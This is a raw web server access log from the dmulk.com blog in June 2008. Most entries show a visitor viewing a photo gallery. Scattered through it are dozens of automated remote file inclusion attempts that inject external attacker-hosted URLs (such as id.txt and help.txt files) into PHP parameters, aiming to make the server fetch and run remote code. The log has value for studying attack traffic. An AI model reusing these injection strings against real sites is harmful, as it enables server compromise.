71.136.40.7 - - [08/Jun/2008:09:36:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.1" 200 398432 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:36:41 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0166.jpg HTTP/1.1" 200 298247 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
64.38.4.3 - - [08/Jun/2008:09:36:46 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:36:46 -0700] "GET /logs/access_080312.log/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:54 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.1" 200 25900 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/#comment-17" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0136_0.jpg HTTP/1.1" 200 10372 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0143.jpg HTTP/1.1" 200 8121 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0138_0.jpg HTTP/1.1" 200 11039 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0137_0.jpg HTTP/1.1" 200 11123 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0140.jpg HTTP/1.1" 200 10677 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0141.jpg HTTP/1.1" 200 10480 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0142.jpg HTTP/1.1" 200 8656 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0144.jpg HTTP/1.1" 200 8231 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0145.jpg HTTP/1.1" 200 8484 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0139_0.jpg HTTP/1.1" 200 10125 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0148.jpg HTTP/1.1" 200 11822 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0147.jpg HTTP/1.1" 200 10799 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0146.jpg HTTP/1.1" 200 11001 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0149.jpg HTTP/1.1" 200 11733 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0150.jpg HTTP/1.1" 200 11726 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0153.jpg HTTP/1.1" 200 10586 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0152.jpg HTTP/1.1" 200 10269 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0151.jpg HTTP/1.1" 200 10712 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0156.jpg HTTP/1.1" 200 11807 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0154.jpg HTTP/1.1" 200 10107 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0155.jpg HTTP/1.1" 200 11432 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0157.jpg HTTP/1.1" 200 10277 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0158.jpg HTTP/1.1" 200 10149 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0159.jpg HTTP/1.1" 200 11807 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0160.jpg HTTP/1.1" 200 11862 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0161.jpg HTTP/1.1" 200 12544 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0162.jpg HTTP/1.1" 200 10926 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0163.jpg HTTP/1.1" 200 10680 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0164.jpg HTTP/1.1" 200 11114 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0165.jpg HTTP/1.1" 200 11479 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0166.jpg HTTP/1.1" 200 9936 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0167.jpg HTTP/1.1" 200 11886 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0169.jpg HTTP/1.1" 200 11315 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0168.jpg HTTP/1.1" 200 11703 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0170.jpg HTTP/1.1" 200 10665 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0171.jpg HTTP/1.1" 200 11005 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0174.jpg HTTP/1.1" 200 8983 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0172.jpg HTTP/1.1" 200 11184 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0173.jpg HTTP/1.1" 200 8455 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0175.jpg HTTP/1.1" 200 10304 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:37:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0177.jpg HTTP/1.1" 200 10183 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:37:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0176.jpg HTTP/1.1" 200 10623 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
70.87.64.234 - - [08/Jun/2008:09:37:09 -0700] "GET /logs/access_080117.log/errors.php?error=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:37:15 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:37:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0156.jpg HTTP/1.1" 200 380022 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
84.234.24.217 - - [08/Jun/2008:09:37:23 -0700] "GET /logs/?custompluginfile[]=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt??? HTTP/1.1" 200 50988 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.234.24.217 - - [08/Jun/2008:09:37:23 -0700] "GET /?custompluginfile[]=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt??? HTTP/1.1" 200 16908 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:09:37:30 -0700] "GET /logs//calendar.php?p=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:09:37:30 -0700] "GET //calendar.php?p=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:40 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:43 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:44 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:37:44 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0168.jpg HTTP/1.1" 200 386333 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:44 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:37:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [08/Jun/2008:09:38:02 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:38:03 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&765 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:38:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0176.jpg HTTP/1.1" 200 328570 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:38:04 -0700] "GET /logs/access_080513.log//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:38:05 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:38:05 -0700] "GET /logs//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:38:18 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.1" 200 25900 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/#comment-17" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:38:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0144.jpg HTTP/1.1" 200 316667 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:38:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "http://dmulk.com/blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:38:46 -0700] "GET /logs/access_080319.log//install/install3.php?database=none&cabsolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:38:53 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:38:54 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.28.2 - - [08/Jun/2008:09:38:59 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:06 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
